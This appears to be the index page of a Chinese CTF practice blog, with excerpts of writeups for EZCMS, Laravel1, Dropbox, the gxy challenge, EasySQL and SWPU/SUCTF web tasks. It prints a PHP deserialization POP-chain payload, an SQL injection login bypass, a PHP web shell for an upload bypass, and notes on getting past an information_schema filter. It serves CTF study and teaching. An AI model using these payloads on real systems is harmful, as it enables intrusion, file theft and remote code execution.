2019bytectfs刷题记录

EZCMS

www.zip出源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
function login(){

$secret = "********";
setcookie("hash", md5($secret."adminadmin"));
return 1;

}

function is_admin(){
$secret = "********";
$username = $_SESSION['username'];
$password = $_SESSION['password'];
if ($username == "admin" && $password != "admin"){
if ($_COOKIE['user'] === md5($secret.$username.$password)){
return 1;
}
}
return 0;
}

Mehr lesen

CISCN2019

Laravel1

一道cmv架构的php反序列化题,以前遇到这样的题,因为代码太多,不知道怎么看,无从下手233
这里记录一下方法吧
1、首先全局搜索__destruct这样的魔术方法
2、看看本类中有没有可控的命令执行命令,如果没有就找有没有那个方法可以调用其他类
3、然后全局搜索能利用的可控函数
wp
include包含文件的链子
TagAwareAdapter::destruct()->commit()->invalidateTags()->PhpArrayAdapter::saveDeferred()->PhpArrayTrait::initialize()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
namespace Symfony\Component\Cache\Adapter;
class PhpArrayAdapter
{
private $file;
public function __construct()
{
$this->file='/flag';
}
}
namespace Symfony\Component\Cache;
final class CacheItem{

}
namespace Symfony\Component\Cache\Adapter;
use Symfony\Component\Cache\CacheItem;
class TagAwareAdapter
{
private $deferred = [];
private $pool;
public function __construct()
{
$this->pool=new PhpArrayAdapter();;
$this->deferred=[new CacheItem()];
}
}
$a= new TagAwareAdapter();
echo(urlencode(serialize($a)));

Mehr lesen

2020HGAME

在家堕落了好多天,今天去做了下Hgame的week3

Mehr lesen

CISCN2019

Dropbox

先注册一个账号,登陆之后上传一个正常的图片,在测试下载功能的时候发现有任意文件下载
class.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);

class User {
public $db;

public function __construct() {
global $db;
$this->db = $db;
}

public function user_exist($username) {
$stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->store_result();
$count = $stmt->num_rows;
if ($count === 0) {
return false;
}
return true;
}

public function add_user($username, $password) {
if ($this->user_exist($username)) {
return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
return true;
}

public function verify_user($username, $password) {
if (!$this->user_exist($username)) {
return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->bind_result($expect);
$stmt->fetch();
if (isset($expect) && $expect === $password) {
return true;
}
return false;
}

public function __destruct() {
$this->db->close();
}
}

class FileList {
private $files;
private $results;
private $funcs;

public function __construct($path) {
$this->files = array();
$this->results = array();
$this->funcs = array();
$filenames = scandir($path);

$key = array_search(".", $filenames);
unset($filenames[$key]);
$key = array_search("..", $filenames);
unset($filenames[$key]);

foreach ($filenames as $filename) {
$file = new File();
$file->open($path . $filename);
array_push($this->files, $file);
$this->results[$file->name()] = array();
}
}

public function __call($func, $args) {
array_push($this->funcs, $func);
foreach ($this->files as $file) {
$this->results[$file->name()][$func] = $file->$func();
}
}

public function __destruct() {
foreach ($this->funcs as $func) {
$table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
}
foreach ($this->results as $filename => $result) {
$table .= '<tr>';
foreach ($result as $func => $value) {
$table .= '<td class="text-center">' . htmlentities($value) . '</td>';
}
$table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">涓嬭浇</a> / <a href="#" class="delete">鍒犻櫎</a></td>';
$table .= '</tr>';
}
echo $table;
}
}

class File {
public $filename;

public function open($filename) {
$this->filename = $filename;
if (file_exists($filename) && !is_dir($filename)) {
return true;
} else {
return false;
}
}

public function name() {
return basename($this->filename);
}

public function size() {
$size = filesize($this->filename);
$units = array(' B', ' KB', ' MB', ' GB', ' TB');
for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
return round($size, 2).$units[$i];
}

public function detele() {
unlink($this->filename);
}

public function close() {
return file_get_contents($this->filename);
}
}

Mehr lesen

php无参数命令执行

gxy禁止套娃

之前没来的及看这道题,现在来buu复现一下
打开没看到什么提示,想着扫一下目录,但是扫buu直接429了,直接看wp去了
git泄露出index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z|\-]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|na|nt|info|dec|bin|hex|oct|pi|log/i', $code)) {
// echo $_GET['exp'];
eval($_GET['exp']);
}
else{
die("还差一点哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("还想读flag,臭弟弟!");
}
}
// highlight_file(__FILE__);

Mehr lesen

极客大挑战刷题记录

EasySQL

一个登陆框,f12没看到什么特殊的东西,admin 123456 登陆一下,提示username or password错误
简单测试username处存在注入,直接万能密码?username=admin’ or 1%23&password=12345 登陆成功

Mehr lesen

swpu刷题记录

https://nikoeurus.github.io/2019/12/09/SWPU-ctf/#%E5%87%BA%E9%A2%98%E4%BA%BA%E4%B8%8D%E7%9F%A5%E9%81%93

Mehr lesen

swpu刷题记录

WEB1

进去一看一个登陆框。注册个账号登陆后,有个发布广告的功能,发布之后查看,怀疑存在二次注入
试了一下发现存在二次注入,注入点在标题处,过滤了ordey by 用group by判断出有22列
回显位置是 2,3,库名web1,但是查表名的时候过滤了information_schema 凉凉
看wp学新操作聊一聊bypass information_schema
MySQL5.7的新特性
由于performance_schema过于发杂,所以mysql在5.7版本中新增了sys schemma,基础数据来自于performance_chema和information_schema
两个库,本身数据库不存储数据。
注:利用innoDB引擎绕过对information_schema的过滤,但是mysql默认是关闭InnoDB存储引擎的
sys.schema_auto_increment_columns表

Mehr lesen

SUCTF刷题记录

[SUCTF 2019]CheckIn

一看这道题和之前gxy那道上传很类似,加GIF89A文件头可以上传.htaccess文件

1
<script language="pHp">@eval($_POST['a'])</script>

Mehr lesen

记一些自己的憨批做题经历

持续更新,记录自己的憨批时刻

Mehr lesen